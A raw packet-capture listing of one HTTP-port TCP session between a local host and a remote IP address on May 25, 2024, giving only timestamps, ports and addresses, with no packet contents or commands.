May 25, 2024 21:29:35.861146927 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.861253023 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.861474991 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.861648083 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.861833096 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.861921072 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.861953974 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.861979008 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.862550974 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.862613916 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.862849951 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.862883091 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.862915993 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.862936020 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.862948895 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.863008022 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.863585949 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.865968943 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866031885 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.866154909 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866377115 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866583109 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.866648912 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866682053 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866744041 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.866940022 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.866976976 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.867039919 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.867535114 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.867568970 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.867602110 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.867624998 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.867635965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.867690086 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.868225098 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.868484020 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.868515968 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.868551970 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.872034073 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.872162104 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.872189045 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.872562885 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.872596979 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.872629881 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.872757912 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.872757912 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.873262882 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.873296976 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.873328924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.873359919 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.873362064 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.873421907 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.874030113 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.874063015 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.874120951 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.874552965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.874584913 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.874640942 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.876342058 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.876478910 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.876543045 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.876753092 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877079010 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877111912 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877142906 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877149105 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.877176046 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877201080 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.877815962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.877886057 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.878099918 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.878134012 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.878190041 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.878596067 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.879338026 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.879369974 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.879400015 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.880907059 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.880975008 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.881068945 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.881750107 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.881783962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.881812096 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.881818056 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.881880045 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.883100033 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883198977 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883233070 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883264065 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.883265018 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883299112 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883317947 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.883335114 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.883395910 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.884243965 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.884277105 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.884335995 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.884710073 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.884855032 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.884915113 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.885162115 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.885196924 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.885257006 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.894002914 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894098997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894130945 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894164085 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894196033 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894315958 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.894315958 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.894423962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894457102 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894532919 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894634008 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894665956 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894699097 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.894723892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.894723892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.894723892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.895431042 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.895464897 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.895495892 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.895498037 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.895533085 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.895559072 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.896008015 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896040916 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896070004 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.896074057 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896132946 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.896773100 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896823883 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896856070 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896887064 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.896888018 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.896949053 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.897597075 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.897630930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.897664070 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.897691965 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.898363113 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.898396015 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.898427010 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.898427963 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.898459911 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.898493052 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.932923079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.932996988 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.933131933 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.933628082 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.933799028 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.934202909 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.934236050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.934267998 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.934402943 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.935084105 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.935117006 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.935152054 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.937918901 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.937954903 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.937988043 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.938097954 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.939049959 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.939081907 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.939266920 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.940475941 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.940790892 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.940853119 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.941062927 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.941095114 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.941155910 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.944320917 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.947199106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.947231054 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.947266102 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.953027010 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.953210115 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.953224897 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.953638077 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.953670025 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.953838110 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.958825111 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.958858013 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.958894968 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.959122896 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959156036 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959187984 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959218979 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959309101 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.959309101 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.959412098 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959445000 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959474087 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.959702969 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959736109 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959757090 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.959768057 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.959820032 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.960462093 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.960495949 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.960555077 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.961291075 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.961324930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.961381912 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.962019920 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.962054014 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.962105036 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.962804079 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.962837934 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.962868929 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.962896109 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.963603020 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.963635921 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.963664055 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.965773106 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.965806007 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.965835094 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.965836048 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.965869904 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.965894938 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.965903997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.965960979 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.966233969 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.966268063 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.966331959 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.966751099 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.966784954 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.966841936 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.967513084 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.967547894 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.967578888 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.967606068 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.968348026 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.968381882 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.968410015 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.969078064 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.969110012 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.969134092 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.969141960 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.969197989 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.970675945 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.970709085 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.970741987 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.970779896 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.971102953 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.971134901 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.971164942 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.971714020 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.971748114 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.971775055 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.971780062 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.971841097 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.972301960 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.972336054 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.972368956 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.972399950 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.972400904 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.972464085 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.973124027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.973157883 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.973187923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.973217964 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.973225117 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.973285913 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.974386930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.974421024 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.974452019 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.974474907 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.974503994 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.974565029 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.975064039 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.975097895 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.975127935 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.975162029 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.975172043 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.975230932 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.976037979 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.976073027 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.976104975 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.976125956 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.977066040 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977102041 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977123976 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.977133989 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977174997 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977195978 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.977926016 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977957964 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.977989912 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.978012085 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.978027105 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.978096962 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.979079962 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.979114056 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.979145050 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.979146004 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.979212999 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.983624935 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.983882904 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.983938932 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.984236956 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.984270096 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.984307051 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.984467030 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.984818935 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.984852076 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.984882116 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.985347986 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.985382080 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.985413074 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.985421896 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.985446930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.985471964 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.986221075 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.986254930 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.986284018 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.986289024 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.986347914 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.986599922 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.987045050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987078905 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987111092 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987133026 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.987653017 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987688065 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987711906 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:35.987721920 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:35.987776041 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.029988050 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030025005 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030107975 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.030220985 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030253887 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030287981 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030308962 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.030817986 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.030877113 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.043168068 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043201923 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043425083 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043437004 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.043534994 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043569088 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043602943 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.043670893 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.043670893 CEST	49744	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:36.044751883 CEST	80	49744	189.163.126.89	192.168.2.4
May 25, 2024 21:29:36.045397043 CEST	80	49744	189.163.126.89	192.168.2.4
